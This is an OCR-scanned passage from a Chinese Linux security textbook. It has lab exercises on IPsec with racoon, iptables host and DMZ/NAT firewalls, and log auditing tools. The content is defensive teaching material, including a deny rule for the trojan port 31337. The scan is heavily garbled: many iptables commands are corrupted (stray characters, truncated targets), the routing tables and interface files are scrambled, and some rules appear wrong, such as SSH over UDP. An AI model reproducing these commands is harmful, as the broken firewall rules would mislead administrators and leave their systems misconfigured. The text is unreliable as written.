(Internet Key Exchange，IKE)。 它 是 一 个 被 互联 网 工程 任务 组 (Internet Engineering Task 
Force，IETF) 实现 的 用 于 彼此 验证 和 安全 连接 系统 的 协议 。 

IPsec 连接 被 分 成 两 个 逻辑 阶段 。 在 第 一 阶段 ，IPsec 节点 引发 和 远程 节点 或 网 络 的 
连接 。 远 程 节点 或 网 络 检查 请 求 节点 的 证 件 , 双方 商谈 连接 所 用 的 验证 方法 ,在 Linux 系 
统 上 ，IPsec 连接 使 用 IPsec 节点 验证 的 “ 预 共 享 密 钥 ”(Pre-shared Key ) 方法 。 在 预 共 
享 密 钥 IPsec 连接 中 ， 双 方 主机 必须 使 用 同一 密 钥 才 能 进入 IPsec 连接 的 第 二 阶段 。 

IPsec 连接 的 第 二 阶段 ， 在 IPsec 节点 间 创 建 “ 安 全 关联 ”(Security Association， 
SA)。 该 阶段 使 用 配置 信息 (如 加 密 方法 、 密 钥 互 换 参数 等 ) 来 建立 SA 数据 库 。 它 管 
理 远 程 节点 和 网 络 间 的 实际 IPsec 连接 。Linux 中 的 IPsec 实现 使 用 IKE 来 在 互联 网 
的 主机 间 共 享 密 钥 。racoon 这 个 密 钥 守护 进程 处 理 IKE 密 钥 分 发 和 交换 任务 。 

IPsec 可 以 通过 主机 到 主机 连接 的 配置 来 连接 一 个 桌面 或 工作 站 到 另 一 个 桌面 或 工 
作 站 。 这 类 连接 使 用 每 个 主机 所 连 的 网 络 来 创建 彼此 间 的 安全 隧道 。 创 建 连接 的 第 一 步 
是 从 每 个 工作 站 收集 系统 和 网 络 信息 。 对 于 主机 到 主机 连接 ， 需 要 以 下 信息 : 

e 两 个 主机 的 JP 地址 。 

e 用 来 把 IPsec 连接 从 其 他 设备 或 连接 中 区 别 出 来 的 独特 名 称 〈 如 ipsec0)。 

e 固定 的 密 钥 或 被 racoon 自动 生成 的 密 钥 。 

e 被 用 来 初始 连接 和 在 会 话 中 交换 密 钥 的 预 共 享 验证 密 钥 。 

例如 : 假定 工作 站 A 和 工作 站 B 想 通过 IPsec 隧道 来 彼此 连接 。 它们 想 使 用 值 为 
foobarbaz 的 预 共 享 密 钥 来 连接 ， 并且 用 户 同意 让 racoon 自动 生成 和 共享 每 个 主机 间 的 
验证 密 钥 。 两 个 主机 用 户 都 决定 把 它们 的 连接 命名 为 ipsec0。 
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【实验 环境 】 

Linux 操作 系统 。 

【实验 步骤 】 

(1) 工作 站 A 和 工作 站 B 之 间 的 主机 到 主机 IPsec 连接 的 ifcfg 文件 (这 个 例子 
中 用 来 识别 该 连接 的 独特 名 称 是 ipsec0， 因 此 其 结果 文件 被 命名 为 /etc/sysconfig/ 
network-scripts/ ifcfg-ipsec0 )。 


DST=X.X.X.X 
TYPE=IPSEC 
ONBOOT=yes 

IKE METHOD=PSK 


工作 站 A 将 会 把 X.X.X.X 替换 成 工作 站 B 的 JP 地 址 ， 而 工作 站 B 将 会 把 
X.X.X.X 替换 成 工作 站 A 的 卫 地 址 。 连 接 被 设置 成 引导 时 被 引发 (ONBOOT=yes)， 
并 使 用 预 共享 密 钥 验 证 方法 (IKE_METHOD=PSK)。 

(2) 编辑 预 共享 密 钥 文 件 〈 叫 作 /etc/sysconfig/mnetwork-scripts/keys-ipsec0)， 两 个 
工作 站 都 使 用 它 来 彼此 验证 。 该 文件 的 内 容 应 该 完全 一 致 ， 并 且 只 有 根 用 户 才 有 读 
写 权 。 


IKE_PSK=foobarbaz 

为 了 改变 keys-ipsec0 文件 的 权限 使 得 只 有 根 用 户 才 有 对 它 的 读 写 权 ， 在 创建 了 该 
文件 后 执行 以 下 命令 : 

chmod 600 /etc/sysconfig/network-scripts/keys-ipsec0 

如 果 需 要 改变 验证 密 钥 ， 必 须 编辑 两 个 工作 站 上 的 keys-ipsec0 文件 。 两 个 文件 必 
须 完全 一 致 才能 保证 正确 的 连接 性 。 

(3) 要 启动 连接 ， 在 每 个 主机 上 以 根 用 户 身份 重新 引导 工作 站 或 执行 以 下 命令 : 

/sbin/ifup ipsec0 

要 测试 IPsec 连接 ， 运行 tcpdump 工具 来 查看 在 主机 (或 网 络 ) 间 传 输 的 网 络 分 
组 ， 并 校 验 它们 是 否 通过 IPsec 被 加 密 了 。 分 组 应 该 包括 AH 头 ， 而 且 应 该 被 显示 为 
ESP 分 组 。ESP 意味 着 它 被 加 密 了 。 例 如 : 


17:13:20.617872 192.168.0.1>192.168.0.91: AH (spi=0x0aaa749f, seq=0x335): 
ESP (spi=0x0ec044le, seq=0x335) (DF) 


(4) 启动 两 个 主机 的 安全 通信 ， 并 使 用 TepDump 进行 抓 包 ， 查 看 加 密 结果 。 


【实验 报告 】 
(1) 叙述 IPSec 的 安全 原理 ， 在 Linux 操作 系统 中 的 配置 方法 。 
(2) 使 用 Sniffer 监听 IPSec 的 通信 ， 检 查 是 否 能 够 窃听 。 
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【思考 题 】 
使 用 IPSec 后 能 够 增加 系统 的 安全 性 ， 但 是 也 会 降低 系统 网 络 性 能 ， 试 通过 流量 分 
析 的 方式 说 明 IPSec 对 系统 的 影响 。 


9.3.3 Linux 防火墙 配置 


【实验 目的 】 
掌握 Linux 下 防火 墙 的 原理 和 配置 方法 。 
【原理 简介 】 


防火 墙 作 为 一 种 网 络 或 系统 之 间 强 制 实行 访问 控制 的 机 制 ， 是 确保 网 络 安全 的 重要 
手段 。 针 对 不 同 的 需求 和 应 用 环境 ， 可 以 量 身 定制 出 不 同 的 防火 墙 系统 。 防 火 墙 大 到 可 
由 考 干 路 由 器 和 堡垒 主机 构成 ， 也 可 小 到 仅仅 是 网 络 操作 系统 上 一 个 防火 墙 软件 包 所 提 
供 的 包 过 滤 功 能 。 

在 众多 网 络 防火 墙 产 品 中 ，Linux 操作 系统 上 的 防火 墙 软件 特点 显著 。 首 先是 Linux 
操作 系统 作为 一 个 类 UNIX 网 络 操作 系统 ， 在 系统 的 稳定 性 、 健 壮 性 及 价格 的 低廉 性 方 
面 都 独 具 优 势 。 更 为 重要 的 是 ，Linux 不 但 本 身 的 源 代码 完全 开放 ， 而 且 系统 包含 建立 
Intemet 环境 所 需要 的 所 有 服务 软件 包 ， 如 Apache Web 服务 器 、DNS 服务 器 、Mail 服务 
器 、Database 服务 器 等 。 同 样 ， 基 于 Linux 的 防火 墙 软件 不 但 具有 强大 的 功能 ， 而 且 大 
部 分 都 是 开放 软件 。 

随 着 Internet 的 飞速 发 展 , 安全 问题 越 来 越 重要 。 利 用 Linux 构建 企业 网 深 受 中 小 企 
业 的 青 睐 ， 而 利用 Linux 构建 企业 网 的 防火 墙 系 统 也 成 为 众多 中 小 企业 的 理想 选择 。 
Linux 内 核 从 1.1 版 本 开始 ， 就 已 经 具备 包 过 滤 功 能 。 在 2.0 内 核 中 ， 开 始 采用 ipfwadm 
来 操作 内 核 的 包 过 滤 规 则 。 到 2.2 版 本 时 ，Linux 内 核 采 用 了 ipchains 来 控制 内 核 的 包 过 
滤 规 则 。 发 展 到 2.4.x 时 ，ipchains 被 一 个 全 新 的 包 过 滤 管 理工 具 iptables 所 替代 。 新 发 
布 的 2.6 版 内 核 也 在 安全 方面 进行 了 改进 。 因 此 ， 无 论 拥 有 哪个 版 本 的 Linux 内 核 ， 无 
论 选 择 哪个 版 本 的 Linux 来 构建 自己 的 企业 网 ， 都 可 以 利用 现 有 的 系统 构建 出 一 个 理想 
实用 的 防火 墙 。 防 火 墙 系统 可 分 为 包 过 滤 型 、 应 用 级 网 关 《〈 也 叫 代理 服务 器 型 防火 墙 ) 
和 电路 级 网 关 三 种 基本 类 型 。 

Linux 提供 的 防火 墙 软件 包 内 置 于 Linux 内 核 中 , 是 一 种 基于 包 过 滤 型 的 防火 墙 实现 
技术 。 其 中 心思 想 是 根据 网 络 层 IP 包头 中 的 源 地 址 、 目 的 地 址 及 包 类 型 等 信息 来 控制 包 
的 流向 。 更 彻底 的 过 滤 则 是 检查 包 中 的 源 端 口 、 目 的 端口 以 及 连接 状态 等 信息 。 Netfilter 
是 Linux 核心 中 一 个 通用 架构 ， 用 于 扩展 各 种 服务 的 结构 化 底层 服务 。 它 提供 一 系列 的 
表 (tables)， 每 个 表 由 若干 链 (chains) 组 成 ， 而 每 条 链 中 可 以 由 一 条 或 数 条 规则 (rule) 
组 成 。 它 可 以 和 其 他 模块 (如 iptables 模块 和 nat 模块 ) 结合 起 来 实现 包 过 滤 功 能 。iptables 
是 一 个 管理 内 核 包 过 滤 的 工具 ， 可 以 加 入 、 插 入 或 删除 核心 包 过 滤 表 格 中 的 规则 。 实 际 
上 真正 来 执行 这 些 过 滤 规 则 的 是 Netfilter。 

iptables 的 具体 内 容 请 参考 iptables 本 身 携带 的 文档 。 
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【实验 环境 】 

Linux 操作 系统 内 核 版 本 2.6 以 上 。 

(1) Linux 9 系统 PC 一 台 (FireWall)， 三 个 8139 TP-LINK 网 卡 。 
Eth0 (IP: 218.197.93.115) 

Ethl (IP: 192.168.1.1) 

Eth2 (IP: 192.168.2.1) 

(2) Linux 9 系统 PC 一 台 (Server)， 一 个 8139 TP-LINK 网 卡 。 
C (IP: 192.168.1.2) 

(3) PC 一 台 ， 双 系统 (Windows XP 和 R.H Linux9)， 一 个 8139 网 卡 。 
A (IP: 192.168.2.2) 

(4) PC 一 台 ，Windows XP 系统 ， 一 个 8139 网 卡 。 

B (IP: 218.197.93.161) 

(5) RJ-45 交叉 线 若干 。 

本 实验 拓扑 结构 如 图 9-7 所 示 。 


外 网 DMZ 


昌 


B:218.197.93.161 1 Eth1:192.168.9.1 
1 Eth2:192.168.2.1 


图 9-7 防火 墙 实验 拓扑 结构 


内 网 


C:192.168.9.9 


Ethl 


1 
1 
1 
1 
1 
1 
1 
1 
| 
由 
1 
1 
1 
1 
1 
1 
1 
1 
1 
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1 


Eth0:218.197.93.115 


A:192.168.2.2 


【实验 步骤 】 
1. iptables 主机 防火 墙 配置 实验 
(1) 使 用 iptables 的 第 一 步 是 启动 iptables 服务 。 可 以 使 用 以 下 命令 进行 : 


service iptables start 


要 使 iptables 在 系统 引导 时 默认 启动 ， 必 须 使 用 chkconfig 来 改变 服务 的 运行 级 别 
状态 : 


chkconfig --level 345 iptables on 


也 可 以 使 用 系统 提供 的 管理 工具 进行 配置 System Setting|Security Level， 出 现 如 
图 9-8 所 示 界 面 , 通过 这 个 界面 可 以 启动 或 停止 iptables 的 运行 , 还 可 以 配置 防火 墙 的 规 
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则 ,在 配置 新 规则 前 首先 备份 原 有 系统 的 iptables 配置 , 可 以 在 命令 行 中 通过 “iptables -L” 
命令 来 看 一 下 当前 的 iptables 配置 ， 选 择 存储 iptables 配置 文件 的 位 置 ， 假 设 要 将 文件 存 
储 在 /varvlib/iptables/saved.cfg， 备 份 的 方法 如 下 : 首先 ， 浏 览 到 该 目录 《使 用 诸如 cd 
/Var/lib/iptables 的 命令 )， 然 后 输入 命令 iptables-save > saved.cfg。 


resse one seov wswwesner 


Eirewall Options [SELinu | 
Security level: | Enable firewall s 
上 口 secue www (HTTPS) 
I 回 FTP 
上 口 al (SMTP) 
Trusted sevices: |DTane 
Www (HTTP) 


图 9-8 防火 墙 配置 界面 


(2) 基本 规则 配置 。iptables 使 用 策略 (policy, -P) 来 创建 默认 规则 。 对 安全 敏感 的 
管理 员 通 常 采取 放弃 所 有 分 组 的 策略 ， 只 逐一 允许 指定 分 组 。 以 下 规则 阻塞 网 络 上 所 有 
的 出 入 分 组 。 


iptables -P INPUT DROP 
iptables -P OUTPUT DROP 


此 外 ， 还 要 拒绝 所 有 转发 分 组 (Forwarded Packets)。 要 达到 这 个 目的 ， 使 用 以 下 
规则 : 


iptables -P FORWARD DROP 


设置 了 策略 链 后 ， 为 特定 网 络 和 安全 需要 创建 新 规则 。 

要 允许 到 防火 墙 上 的 端口 80 的 通信 ， 远 程 SSH 访问 添加 以 下 规则 : 
iptables -A INPUT -p tcp -m tcp --sport 80 -j ACCEPT 
iptables -A OUTPUT -p tcp -m tcp --dport 80 -]j ACCEPT 


iptables -A INPUT -p tcp --dport 22 -j ACCEPT 
iptables -A OUTPUT -p udp --sport 22 -]j ACCEP 


(3) 有 些 木马 程序 会 扫描 端口 31337 一 31340〈 即 黑客 语言 中 的 elite 端口 ) 上 的 服 
务 。 既 然 合 法 服务 都 不 使 用 这 些 非 标准 端口 来 通信 ， 阻 塞 这 些 端 口 能 够 有 效 地 减少 网 络 
上 可 能 被 感染 的 机 器 和 它们 的 远程 主 服务 器 进行 独立 通信 的 机 会 。 
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iptables -A OUTPUT -o eth0 -p tcp --dport 31337 --sport 31337 -]j DROP 
iptables -A FORWARD -o eth0 -P tcp --dport 31337 --sport 31337 -]j DROP 


还 可 以 阻塞 试图 假冒 目标 主机 所 在 LAN 的 专用 卫 地 址 混入 的 连接 。 例 如 : 如 果 
目标 主机 的 LAN 使 用 192.168.1.0/24 范围 ， 面 向 互联 网 的 网 络 设备 〈 如 eth0) 上 就 可 
以 设置 一 条 规则 来 放弃 到 那个 设备 的 使 用 目标 主机 所 在 LAN 的 IP 范围 的 分 组 。 因 为 
推荐 使 用 的 默认 政策 是 拒绝 转发 分 组 ， 所 有 到 面向 外 界 的 设备 (eth0〉 的 假冒 IP 地 址 
都 会 被 自动 拒绝 。 


iptables -A FORWARD -s 192.168.1.0/24 -i eth0 -j DROP 


(4) 防火 墙 规 则 只 在 计算 机 处 于 开启 状态 时 才 有 效 。 如 果 系 统 被 重新 引导 ， 这 些 规 
则 就 会 自动 被 清除 并 重 设 。 要 保存 规则 以 便 今后 载 入 ， 请 使 用 以 下 命令 : 


/sbin/service iptables save 


当前 设置 就 会 保存 在 /etc/sysconfig/iptables 文件 中 ， 这 些 规则 会 在 服务 启动 或 重新 

启动 时 〈 包 括 机 器 被 重新 引导 时 ) 被 应 用 。 

2. iptables 网 络 防火 墙 实验 

实现 FireWall 的 NAT 功能 让 A 能 访问 WAN(218.197.93.254), 在 Server 上 开启 FTP 

和 Web 服务 〈 简 单 的 ) 使 得 A，B 正常 访问 C， 开 启 防火 墙 使 得 : 

e 内 网 可 以 访问 外 网 。 防 火 墙 需要 进行 源 地 址 转换 。 

e@ 内 网 可 以 访问 DMZ。 内 网 用 户 使 用 和 管理 DMZ 中 的 服务 器 。 

e 外 网 不 能 访问 内 网 。 内 网 中 存放 的 是 内 部 数据 ， 这 些 数据 不 允许 外 网 的 用 户 进 行 
访问 。 

e 外 网 可 以 访问 DMZ。DMZ 中 的 服务 器 本 身 就 是 要 给 外 界 提供 服务 的 ， 所 以 外 网 
必须 可 以 访问 DMZ。 同时， 外 网 访问 DMZ 需要 由 防火 墙 完成 对 外 地 址 到 服务 器 
实际 地 址 的 转换 。 

。 DMZ 不 能 访问 内 网 。 如 果 违 背 此 策略 ， 则 当 入 侵 者 攻陷 DMZ 时 ， 就 可 以 进一步 
进攻 到 内 网 的 重要 数据 。 

。 DMZ 不 能 访问 外 网 。DMZ 中 的 服务 器 专门 用 于 给 外 界 提供 服务 ， 所 以 外 网 必须 
可 以 访问 DMZ， 而 DMZ 中 的 服务 器 则 不 允许 主动 访问 外 网 。 

1) 实现 路 由 功能 

首先 来 配置 eth0。 给 这 个 网 络 接口 分 配 地 址 218.197.93.115， 运 行 下 列 命令 : 

# ifconfig eth0 218.197.93.115 netmask 255.255.255.0 

为 了 使 这 个 地 址 不 在 计算 机 重新 启动 后 消失 ， 编 辑 /etc/sysconfig/network-scripts/ 

这 他 -eth0 文件 : 


DEVICE = eth0 
ONBOOT = yes 
BROADCAST = 218.197.93.255 
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NETWORK = 218.197.93.0 
NETMASK = 255.255.255.0 
IPADDR = 218.197.93.115 


增加 一 条 静态 路 由 : 
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# route add -net 218.197.93.0 netmask 255.255.255.0 


然后 配置 ethl,ethl 与 192.168.9.0 网 段 相连 ,分 配给 它 的 地 址 是 192.168.9.1, 使 用 ifconfig 


命令 为 它 配置 参数 : 
# ifconfig ethl 192.168.9.1 netmask 255.255.255.0 


编辑 /etc/sysconfig/network-scripts/ife-ethl 文件 : 


DEVICE 
ONBOOT 
BROADCAST 
NETWORK 
NETMASK 
IPADDR 


增加 一 条 静态 路 由 : 
# route add -net192.168.1.0 netmask 255.255.255.0 


最 后 配置 eth2， 它 连接 192.168.2.0 网 段 ， 分 配 的 IP 地 址 是 
命令 : 


# ifconfig eth2 192.168.2.1 netmask 255.255.255.0 


ethl 
yes 


= 192.168.9.255 
192>1609.0 
255,255.2550 
192.168.9.1 


编辑 /etc/sysconfig/network-scripts/ifefg-eth2 文件 : 


ll 


DEVICE 
ONBOOT 
BROADCAST 
NETWORK 
NETMASK 
IPADDR 


eth2 
yes 


ll 


192.168.2.255 
192.168.2.0 
255.255.255.0 

192,168.2.1 


增加 一 条 静态 路 由 : 


# route add -net 192.168.2.0 netmask 255.255.255.0 


这 样 网 络 中 就 有 三 条 静态 路 由 记录 了 : 


# route Kernel IP routing table Destination Gateway 
Ref Use 
218,197 


192.168 


Iface 
:93.115 *255.255-.255.00 0 0 0 ethbh0 
1.0*255.255.255.00 0 0 0 ethl 


192.168.2.1， 执 行 下 列 


Genmask Flags Metric 
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192.168.2.0*255.255.255.0U 0 0 0 eth2 


还 要 为 系统 增加 一 条 默认 路 由 ， 因 为 默认 的 路 由 是 把 所 有 的 数据 包 都 发 往 它 的 上 一 
级 网 关 ， 因 此 增加 如 下 的 默认 路 由 记录 : 


# route add default gw 218.197.93.254 


这 样 系统 的 静态 路 由 表 建 立 完成 ， 它 的 内 容 是 : 


# route Kernel IP routing table Destination Gateway Genmask Flags Metric 
Ref Use Iface 

218,197.93.115 *255.255.255.0U 0 0 0 eth0 

192.168.1.0*255.255.255.0U 0 0 0 ethl 

192.168.2.0*255.255.255.0U 0 0 0 eth2 

default218.197.93.254 0.0.0.0 UG 0 0 0 eth0 


2) 在 C 上 开启 WWW 和 FTP 服务 


#service httpd start 
#service vsftpd start 


3) 设置 iptables 的 规则 配置 文件 
(1) 防火 墙 上 初始 化 : 


iptables -F 

iptables -t nat -了 

iptables -Xx 

iptables -t nat -Xx 

iptables -2 

iptables -t nat -2 

iptables -P INPUT DROP 

iptables -P OUTPUT DROP 

iptables -P FORWARD DROP 

iptables -t nat -P POSTROUTING DROP 


(2) 要 增加 系统 的 IP 转发 功能 ,执行 如 下 命令 打开 IP 转发 功能 : 

echo 1 > /proc/sys/net/ipv4/ip_ forward 

(3) 允许 A 机 器 访问 WAN: 

iptables -A FORWARD -s 192.168.2.0/24 -i eth2 -j ACCEPT 

(4) A 往 C 的 包 都 允许 0 字符 : 

iptables -A FORWARD -s 192.168.2.0/24 -d 192.168.1.0/24 -i eth2 -j ACCEPT 
(5) WAN 往 A 的 包 都 不 允许 : 


iptables -t nat -A PREROUTING -s 0.0.0.0/0 -d 192.168.2.0/24 -i eth0 -j DROP 
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(6) 允许 WAN 向 内 部 发 送 已 建立 连接 的 包 和 相关 连接 的 包 : 


iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 218.197. 
93.115 


(7) 允许 WAN 发 往 WWW 和 FTP 服务 器 的 包 并 把 对 网 关 的 WWW 和 FTP 请 求 转 
发 到 内 部 的 WWW 和 FTP 服务 器 上 : 


iptables -t nat -A PREROUTING -p tcp --dport 80 -d 218.197.93.115 -s 
0.0.0.0/0 -i eth0 -j DNAT --to 192.168.1.2 

iptables -A FORWARD -p tcp -s 0.0.0.0/0 -d 192.168.1.2 -i eth0 --dport 80 
-j ACCEPT 

iptables -A FORWARD -p tcp -d 0.0.0.0/0 -s 192.168.1.2 -i ethl --sport 80 ! 
--syn -j] ACCEPT 

iptables -t nat -A PREROUTING -p tcp --dport 20,21 -d 218.197.93.115 -s 
0.0.0.0/0 -i eth0 -j DNAT --to 192.168.1.2 

iptables -A FORWARD -p tcp -s 0.0.0.0/0 -d 192.168.1.2 -i eth0 --dport 20,21 
-j ACCEPT 

iptables -A FORWARD -p tcp -d 0.0.0.0/0 -s 192.168.1.2 -iethl --sport 20,21! 
--syn -j] ACCEPT 

iptables -t nat -A PREROUTING -s 0.0.0.0/0 -d 192.168.1.0/24 -i eth0 -j 
DROP 


(8) 不 能 访问 A，B: 

iptables -A FORWARD -s 192.168.1.0/24 -d 0.0.0.0/0 -i ethl -j DROP 
4) 进行 访问 测试 

【实验 报告 】 


(1) 叙述 主机 防火 墙 的 配置 过 程 和 测试 结果 。 
(2) 叙述 网 络 防火 墙 的 配置 过 程 和 测试 结果 。 


【思考 题 】 
查找 资料 ， 分 析 iptables 的 安全 机 制 。 


94 ”安全 审计 


9.4.1 日 志 审 计 


【实验 目的 】 
掌握 使 用 Linux 系统 的 安全 审计 功能 ， 来 更 好 地 保护 系统 安全 。 
【原理 简介 】 


作为 信息 犯罪 取证 和 系统 安全 的 监督 机 制 ， 安 全 审计 功能 是 不 可 或 缺 的 。Linux 系 
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统 提供 的 系统 安全 审计 包括 两 个 部 分 : 一 是 日 志 系 统 ， 二 是 文件 完整 性 审计 。 日 志 系 统 
是 一 种 由 核心 触发 的 、 详 细 的 、 可 定制 的 、 彻 底 的 安全 访问 记录 ， 它 记载 了 所 有 用 户 关 
心 的 安全 事件 ， 包 括 敏感 资源 的 访问 记录 和 所 有 未 授权 的 非法 访问 企图 。 系 统 使 用 一 个 
专门 的 角色 ， 来 定义 这 些 安全 记录 的 规则 ， 查 看 记载 下 来 的 审计 记录 。 系 统 安 全 审计 功 
能 是 不 会 被 人 恶意 中 断 的 ， 审 计 记录 也 是 无 法 随意 删除 的 ， 因 为 它 受到 核心 的 保护 。 

安全 审计 可 以 考察 若干 日 志文 件 〈 内 核 、 系 统 、 服 务 器 、 网 络 、 防 火 墙 等 )， 并 拿 日 
志文 件 和 常见 已 知 攻击 的 内 部 数据 库 进 行 比 较 。syslog 软件 提供 了 系统 记录 功能 以 及 搜 
集 内 核 消 息 功能 。 过 滤 日 志 〈 记 录 网 络 和 内 核 事件 的 日 志 可 能 会 非常 详细 )、 分 析 日 志 、 
使 用 它 自己 的 严重 性 级 别 系统 来 重新 给 异常 消息 标签 ， 并 把 它们 收集 到 它 自 己 的 特殊 日 
志 以 供 管理 员 分 析 使 用 。 

安全 审计 系统 还 可 以 校 验 重 要 文件 和 可 执行 文件 的 完好 性 。 它 检查 敏感 文件 〈 以 及 
管理 员 添 加 的 任何 文件 ) 的 数据 库 , 并 使 用 md5sum (128 位 算法 ) 或 shalsum (160 位 
算法 ) 之 类 的 消息 文件 摘要 工具 来 为 每 个 文件 创建 一 个 校 验 和 (checksum )。 然 后 ， 审 计 
系统 把 这 些 校 验 和 保存 到 一 个 纯 文 本 文件 中 ， 并 定期 比较 实际 文件 的 校 验 和 与 这 个 纯 文 
本 文件 中 保存 的 数值 。 如 果 发 现 了 任何 不 匹配 之 处 ， 系 统 就 会 通过 电子 邮件 来 警告 管 
理 员 。 

Linux 日 志 存 储 在 /var/log 目录 中 。 这 里 有 几 个 由 系统 维护 的 日 志文 件 ， 但 其 他 服 
务 和 程序 也 可 能 会 把 它们 的 日 志 放 在 这 里 。 大 多 数 日 志 只 有 root 才 可 以 读 ， 不 过 只 需 
要 修改 文件 的 访问 权限 就 可 以 让 其 他 人 可 读 。messages 日 志 是 核心 系统 日 志文 件 。 它 包 
含 系统 启动 时 的 引导 消息 ， 以 及 系统 运行 时 的 其 他 状态 消息 。LO 错误 、 网 络 错误 和 其 
他 系统 错误 都 会 记录 到 这 个 文件 中 。 其 他 信息 ， 比 如 某 个 人 的 身份 切换 为 root， 也 在 这 
里 列 出 。 


【实验 环境 】 
Red Hat Linux 9 或 Fedora CoreLinux 3 以 上 的 版 本 。 


【实验 步骤 】 

日 志文 件 时 刻 记录 着 系统 的 运行 情况 ， 用 户 可 以 通过 它 来 检查 错误 发 生 的 原因 ， 或 
者 受到 攻击 时 攻击 者 留 下 的 痕迹 。 日 志 主要 的 功能 有 : 审计 和 监测 。 还 可 以 实时 地 监测 
系统 状态 ， 监 测 和 追踪 侵入 者 等 。 所 以 黑客 往往 在 攻击 时 修改 日 志文 件 ， 来 隐藏 踪迹 。 
Linux 日 志 存储 在 /var/log 目录 中 ， 因 此 要 限制 对 / var / log 文件 的 访问 ， 禁 止 一 般 权 
限 的 用 户 去 查看 日 志文 件 。 在 Linux 系统 中 ， 有 三 个 主要 的 日 志 子 系统 。 

1. 连接 时 间 日 志 

由 多 个 程序 执行 , 把 记录 写 到 /var/log/wtmp 和 /var/run/ utmp 。login 等 程序 更 新 wtmp 
和 utmp 文件 ， 使 系统 管理 员 能 够 跟踪 谁 在 何 时 登录 到 系统 。wtmp 和 utmp 文件 都 是 二 
进 制 文件 ， 不 能 被 诸如 tail 命令 剪贴 或 合并 《使 用 cat 命令 )。 用 户 需要 使 用 who、w、 
users、last 和 ac 来 使 用 这 两 个 文件 包含 的 信息 。 

who 命令 查询 utmp 文件 并 报告 当前 登录 的 每 个 用 户 。who 的 默认 输出 包括 用 户 名 、 
终端 类 型 、 登 录 日 期 及 远程 主机 。w 命令 查询 utmp 文件 并 显示 当前 系统 中 每 个 用 户 和 它 


148 


第 9 章 Linux 操作 系统 安全 


所 运行 的 进程 信息 。users 用 单独 的 一 行 打印 出 当前 登录 的 用 户 ， 每 个 显示 的 用 户 名 对 应 
一 个 登录 会 话 。 如 果 一 个 用 户 有 不 止 一 个 登录 会 话 ， 那 他 的 用 户 名 将 显示 相同 的 次 数 。 
last 命 令 往 回 搜索 wtmp 来 显示 自从 文件 第 一 次 创建 以 来 登录 过 的 用 户 , 如 果 指 明了 用 户 ， 
那么 last 只 报告 该 用 户 的 近期 活动 。ac 命令 根据 当前 的 /var/log/wtmp 文件 中 的 登录 进入 
和 退出 来 报告 用 户 连 接 的 时 间 (小 时 )， 如 果 不 使 用 标志 ， 则 报告 总 的 时 间 。 

lastlog 文件 在 每 次 有 用 户 登录 时 被 查询 。 可 以 使 用 lastlog 命令 来 检查 某 特定 用 户 上 
次 登录 的 时 间 ， 并 格式 化 输出 上 次 登录 日 志 /var/log/lastlog 的 内 容 。 它 根据 UID 排序 显 
示 登 录 名 、 端 口号 〈tty) 和 上 次 登录 时 间 。 


日 志 审 计 操 作 如 下 : 

[root@mylivx ~]# who 

root :0 Aug 31 11:22 

root pts/1 Aug 31 11:25 (:0.0) 


[root@mylivx ~]# w 
11:26:58 up 13 min, 2 users, load average: 0.33, 1.04, 0.79 


USER i FROM LOGIN@ IDLE JCPU PCPU WHAT 
root :0 - 11:22 ?xdm? 46.90s 0.88s /usr/bin/gnome-session 
root pts/1l :0.0 E25 0.00s 0.39s 0.04s w 


[root@mylivx ~]# users 
root root 
[root@mylivx ~]# last 


root pts/1 :0.0 Thu Aug 31 11:25 still logged in 
root :0 Thu Aug 31 11:22 still logged in 
reboot system boot 2.6.11-1.1369 FC Thu Aug 31 11:15 (00:11) 
root pts/2 :0.0 Thu Aug 31 00:38 - down (00:53) 
root pts/1 :和 .和 Wed Aug 30 23:27 - down (02:03) 
root :0 Wed Aug 30 23:26 - down (02:04) 
reboot System boot 2.6.11-1.1369 FC Wed Aug 30 23:23 (02:07) 


wtmp begins Mon Aug 28 22:19:41 2006 
[root@mylivx ~]# ac 

total 16.49 
[root@mylivx ~]# 


2. 错误 日 志 

由 syslogd (8) 执行 。 各 种 系统 守护 进程 、 用 户 程 序 和 内 核 通过 syslog (3) 向 文件 
/var/log/messages 报告 值得 注意 的 事件 。 另 外 有 许多 UNIX 程序 创建 日 志 。 像 HTTP 和 
FTP 这 样 提供 网 络 服务 的 服务 器 也 保持 详细 的 日 志 。syslog 已 被 许多 日 志 函 数 采 纳 ， 它 
用 在 许多 保护 措施 中 一 一 任何 程序 都 可 以 通过 syslog 记录 事件 。syslog 可 以 记录 系统 事 
件 ， 可 以 写 到 一 个 文件 或 设备 中 ， 或 给 用 户 发 送 一 个 信息 。 它 能 记录 本 地 事件 或 通过 网 
络 记录 另 一 个 主机 上 的 事件 。 
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3. 程序 日 志 

许多 程序 通过 维护 日 志 来 反映 系统 的 安全 状态 。su 命令 允许 用 户 获得 另 一 个 用 户 的 
权限 ， 所 以 它 的 安全 很 重要 ， 它 的 文件 为 sulog。 同 样 的 还 有 sudolog。 另 外 ， 像 Apache 
有 两 个 日 志 : access_ log 和 error log。 

在 Linux 系统 中 如 果 仅 把 系统 事件 作为 日 志 记录 下 来 ， 而 不 去 查看 ， 是 没有 用 的 ， 
大 部 分 的 日 志文 件 都 是 文本 格式 , 可 以 方便 地 查看 。 在 Red Hat Linux 中 还 可 以 使 用 系统 
提供 的 日 志 查 看 工具 进行 查看 。 

但 是 系统 管理 员 不 可 能 时 时 地 检查 日 志文 件 ， 并 且 日 志文 件 很 大 ， 很 多 时 候 通过 这 
种 浏览 的 方式 审查 日 志 很 不 方便 。Red Hat Linux 中 提供 了 logwatch 工具 ,定期 自动 检查 
日 志 并 发 送 邮 件 到 管理 员 信箱 。 需 要 修改 /etcllog.d/conf/ logwatch.conf 文件 ， 在 MailTo = 
root 参数 后 增加 管理 员 的 邮件 地 址 。logwatch 会 定期 检查 日 志 , 过 滤 有 关 使 用 root sudo、 
telnet、ftp 登录 等 信息 ， 协 助 管理 员 分 析 日 常安 全 。 

4. Swatch 实时 的 日 志 监控 工具 

系统 管理 员 可 以 设置 所 感 兴趣 的 事件 , 它 可 以 在 事件 发 生 的 时 候 告诉 管理 员 。Swatch 
有 两 种 运行 方式 : 一 种 可 以 在 检查 日 志 完毕 后 退出 ， 另 一 种 可 以 连续 监视 日 志 中 的 新 信 
息 。Swatch 提供 了 许多 通知 方式 ， 例 如 E-mail、 振 铃 、 终 端 输出 、 多 种 颜色 等 。 可 以 从 
下 面 的 站 点 下 载 : ftp://ftp.stanford.edu/general/security-tools/ swatch/。 

如 果 系 统 没 有 安装 Swatch 软件 包 ， 首 先 需要 下 载 和 解压 缩 最 新 的 Swatch 软件 包 。 
